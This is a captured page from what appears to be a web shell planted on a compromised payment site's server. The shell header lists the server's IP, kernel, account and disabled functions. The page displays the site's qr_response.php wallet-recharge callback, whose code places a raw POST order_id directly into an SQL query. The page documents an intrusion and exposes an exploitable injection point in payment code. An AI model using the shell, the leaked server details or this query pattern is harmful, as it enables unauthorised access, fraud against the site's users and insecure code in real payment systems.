shell bypass 403

GrazzMean Shell

: /home/gutlooks/www/qrpay/ [ drwxr-xr-x ]
Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : qr_response.php
<?php
//   function __autoload($class)
//     {
//         include("../zebra_cross/admin_login/classess/".$class.".php");
//     }
     spl_autoload_register(function($class) {
    include("../zebra_cross/admin_login/classess/".$class.".php");
});

        
    $sqlfun = new sqlfunction();
    $admin = new admin_login();
    date_default_timezone_set("Asia/kolkata");
    $rawData = file_get_contents("php://input");
    
        $cur_date = date('Y-m-d');
        // $inputData = file_get_contents("php://input");
        // $data = json_decode($inputData, true);
        // // $yu = array("dataa"=>$data);
        // $sqlfun->ins_data("keton",$yu); 
        if(isset($_POST['order_id']))
        {
            $order_id = $_POST['order_id'];
            $cnd = "transaction_id = '$order_id' && status = 'Pending'";
            $check = $sqlfun->fetchdata("add_money_request",$cnd);
            if($check->rowCount() > 0)
            {
                $row = $check->fetch(PDO::FETCH_OBJ);
                $status = $row->status;
                $row_id = $row->r_id;
                $amount = $row->amount;
                $player_id = $row->player_id;
                if($status == "Pending")
                {
                    $dataaa = [
                    'amount' => $amount,
                    'player_id' => $player_id,
                    'status' => 'Pending',
                    'row_id' => $row_id
                ];
                
                $urla = "https://gutlooks.com/zebra_cross/admin_login/process.php"; // Replace with your target URL
                
                // Initialize cURL session
                $ch = curl_init();
                
                // Configure cURL options
                curl_setopt($ch, CURLOPT_URL, $urla);
                curl_setopt($ch, CURLOPT_POST, true); // Use POST method
                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($dataaa)); // Attach data
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Receive server response
                curl_setopt($ch, CURLOPT_HTTPHEADER, [
                    'Content-Type: application/x-www-form-urlencoded' // Specify content type
                ]);
                
                // Execute cURL request
                $response = curl_exec($ch);
                    //  $app_cnd = "r_id = '$row_id'"; 
                    // $update_app_status = array("status"=>"Approved");
                    // if($sqlfun->updated("add_money_request",$update_app_status,$app_cnd))
                    //     {   
                    //         //get wallet money of player
                    //         $get_p_wallet_cnd = "p_id = '$player_id'";
                    //         $get_p_wallet_check = $sqlfun->fetchdata("player",$get_p_wallet_cnd);
                    //         $row_get_p_wallet = $get_p_wallet_check->fetch(PDO::FETCH_OBJ);
                    //         $p_wallet = $row_get_p_wallet->wallet;
                    //         $new_wallet = ceil($p_wallet + $amount);
                    //         //update player_wallet
                    //         $update_player_wallet_amount = array("wallet"=>$new_wallet);
                    //         if($sqlfun->updated("player",$update_player_wallet_amount,$get_p_wallet_cnd))
                    //             {
                    //                 $ins_app_wallet_history = array("date"=>$cur_date,"row_id"=>$row_id,"type"=>"Recharge","user_id"=>$player_id,"amount"=>$amount);
                    //                 $sqlfun->ins_data("wallet_history",$ins_app_wallet_history);
                                    
                                    
                                    
                    //             }
                            
                    //     }
                }
            }
            
        }
            ?>
© 2026 GrazzMean